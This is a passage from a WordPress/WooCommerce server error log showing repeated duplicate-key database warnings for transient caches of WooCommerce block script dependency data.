ilters-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\",\\"version\\":\\"b7ae146ebe7863f9f6b8\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/all-products.js\\",\\"version\\":\\"de63136b925fe4405f95\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-blocks-shared-context\\",\\"wc-blocks-shared-hocs\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-api-fetch\\",\\"wp-autop\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-escape-html\\",\\"wp-hooks\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-style-engine\\",\\"wp-url\\",\\"wp-wordcount\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\
[Tue May 26 16:48:49.667753 2026] [lsapi:warn] [pid 823496:tid 823638] [client 45.13.225.123:33100] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_timeout_woocommerce_blocks_asset_api_script_data_ssl', '1782386329', 'off') ON DUPLICATE KEY UPDATE `option_name` = VALUES(`option_name`), `option_value` = VALUES(`option_value`), `autoload` = VALUES(`autoload`) made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, Automattic\\WooCommerce\\Blocks\\Assets\\Api->update_script_data_cache, set_transient, add_option\n
[Tue May 26 16:48:49.667780 2026] [lsapi:warn] [pid 817651:tid 817877] [client 45.13.225.123:33192] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_timeout_woocommerce_blocks_asset_api_script_data_ssl', '1782386329', 'off') ON DUPLICATE KEY UPDATE `option_name` = VALUES(`option_name`), `option_value` = VALUES(`option_value`), `autoload` = VALUES(`autoload`) made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, Automattic\\WooCommerce\\Blocks\\Assets\\Api->update_script_data_cache, set_transient, add_option\n
[Tue May 26 16:48:49.669148 2026] [lsapi:warn] [pid 823496:tid 823638] [client 45.13.225.123:33100] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_woocommerce_blocks_asset_api_script_data_ssl', '{\\"script_data\\":{\\"assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\",\\"version\\":\\"07c2f0675ddd247d2325\\",\\"dependencies\\":[\\"wp-hooks\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-types.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-types.js\\",\\"version\\":\\"bda84b1be3361607d04a\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\",\\"version\\":\\"ca04183222edaf8a26be\\",\\"dependencies\\":[\\"wp-api-fetch\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\",\\"version\\":\\"3b21c127321dcdffaeba\\",\\"dependencies\\":[\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-api-fetch\\",\\"wp-data\\",\\"wp-data-controls\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-notices\\",\\"wp-polyfill\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\",\\"version\\":\\"389607d443f2591c0913\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\",\\"version\\":\\"1c879273bd5c193cad0a\\",\\"dependencies\\":[\\"react\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\",\\"version\\":\\"00ce86264fca4977b16a\\",\\"dependencies\\":[\\"react\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-dom-ready\\",\\"wp-element\\",\\"wp-hooks\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\",\\"version\\":\\"6eb6865831aa5a75475d\\",\\"dependencies\\":[\\"react\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\",\\"version\\":\\"4f21a9f43ea5bfa7f02e\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-data-store\\",\\"wc-blocks-shared-context\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/price-format.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/price-format.js\\",\\"version\\":\\"eb7a7398126f71912b09\\",\\"dependencies\\":[\\"wc-settings\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\",\\"version\\":\\"cbe41c7abb3949767748\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\",\\"version\\":\\"5980872eb77817dd6b18\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-warning\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\",\\"version\\":\\"211abb6906805368a551\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-data-store\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\",\\"version\\":\\"8997b5406dcf18064a4e\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\",\\"version\\":\\"c33101c7e57ca780e0d8\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters.js\\",\\"version\\":\\"07254c2f32c26d21c0ef\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\",\\"version\\":\\"b7ae146ebe7863f9f6b8\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/all-products.js\\",\\"version\\":\\"de63136b925fe4405f95\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-blocks-shared-context\\",\\"wc-blocks-shared-hocs\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-api-fetch\\",\\"wp-autop\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-escape-html\\",\\"wp-hooks\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-style-engine\\",\\"wp-url\\",\\"wp-wordcount\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\
[Tue May 26 16:48:49.669223 2026] [lsapi:warn] [pid 817651:tid 817877] [client 45.13.225.123:33192] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_woocommerce_blocks_asset_api_script_data_ssl', '{\\"script_data\\":{\\"assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\",\\"version\\":\\"07c2f0675ddd247d2325\\",\\"dependencies\\":[\\"wp-hooks\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-types.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-types.js\\",\\"version\\":\\"bda84b1be3361607d04a\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\",\\"version\\":\\"ca04183222edaf8a26be\\",\\"dependencies\\":[\\"wp-api-fetch\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\",\\"version\\":\\"3b21c127321dcdffaeba\\",\\"dependencies\\":[\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-api-fetch\\",\\"wp-data\\",\\"wp-data-controls\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-notices\\",\\"wp-polyfill\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\",\\"version\\":\\"389607d443f2591c0913\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\",\\"version\\":\\"1c879273bd5c193cad0a\\",\\"dependencies\\":[\\"react\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\",\\"version\\":\\"00ce86264fca4977b16a\\",\\"dependencies\\":[\\"react\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-dom-ready\\",\\"wp-element\\",\\"wp-hooks\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\",\\"version\\":\\"6eb6865831aa5a75475d\\",\\"dependencies\\":[\\"react\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\",\\"version\\":\\"4f21a9f43ea5bfa7f02e\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-data-store\\",\\"wc-blocks-shared-context\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/price-format.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/price-format.js\\",\\"version\\":\\"eb7a7398126f71912b09\\",\\"dependencies\\":[\\"wc-settings\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\",\\"version\\":\\"cbe41c7abb3949767748\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\",\\"version\\":\\"5980872eb77817dd6b18\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-warning\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\",\\"version\\":\\"211abb6906805368a551\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-data-store\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\",\\"version\\":\\"8997b5406dcf18064a4e\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\",\\"version\\":\\"c33101c7e57ca780e0d8\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters.js\\",\\"version\\":\\"07254c2f32c26d21c0ef\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\",\\"version\\":\\"b7ae146ebe7863f9f6b8\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/all-products.js\\",\\"version\\":\\"de63136b925fe4405f95\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-blocks-shared-context\\",\\"wc-blocks-shared-hocs\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-api-fetch\\",\\"wp-autop\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-escape-html\\",\\"wp-hooks\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-style-engine\\",\\"wp-url\\",\\"wp-wordcount\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\
[Tue May 26 16:48:49.699133 2026] [lsapi:warn] [pid 817651:tid 817895] [client 45.13.225.123:33226] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_timeout_woocommerce_blocks_asset_api_script_data_ssl', '1782386329', 'off') ON DUPLICATE KEY UPDATE `option_name` = VALUES(`option_name`), `option_value` = VALUES(`option_value`), `autoload` = VALUES(`autoload`) made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, Automattic\\WooCommerce\\Blocks\\Assets\\Api->update_script_data_cache, set_transient, add_option\n
[Tue May 26 16:48:49.700534 2026] [lsapi:warn] [pid 817651:tid 817895] [client 45.13.225.123:33226] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_woocommerce_blocks_asset_api_script_data_ssl', '{\\"script_data\\":{\\"assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\",\\"version\\":\\"07c2f0675ddd247d2325\\",\\"dependencies\\":[\\"wp-hooks\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-types.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-types.js\\",\\"version\\":\\"bda84b1be3361607d04a\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\",\\"version\\":\\"ca04183222edaf8a26be\\",\\"dependencies\\":[\\"wp-api-fetch\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\",\\"version\\":\\"3b21c127321dcdffaeba\\",\\"dependencies\\":[\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-api-fetch\\",\\"wp-data\\",\\"wp-data-controls\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-notices\\",\\"wp-polyfill\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\",\\"version\\":\\"389607d443f2591c0913\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\",\\"version\\":\\"1c879273bd5c193cad0a\\",\\"dependencies\\":[\\"react\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\",\\"version\\":\\"00ce86264fca4977b16a\\",\\"dependencies\\":[\\"react\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-dom-ready\\",\\"wp-element\\",\\"wp-hooks\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\",\\"version\\":\\"6eb6865831aa5a75475d\\",\\"dependencies\\":[\\"react\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\",\\"version\\":\\"4f21a9f43ea5bfa7f02e\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-data-store\\",\\"wc-blocks-shared-context\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/price-format.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/price-format.js\\",\\"version\\":\\"eb7a7398126f71912b09\\",\\"dependencies\\":[\\"wc-settings\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\",\\"version\\":\\"cbe41c7abb3949767748\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/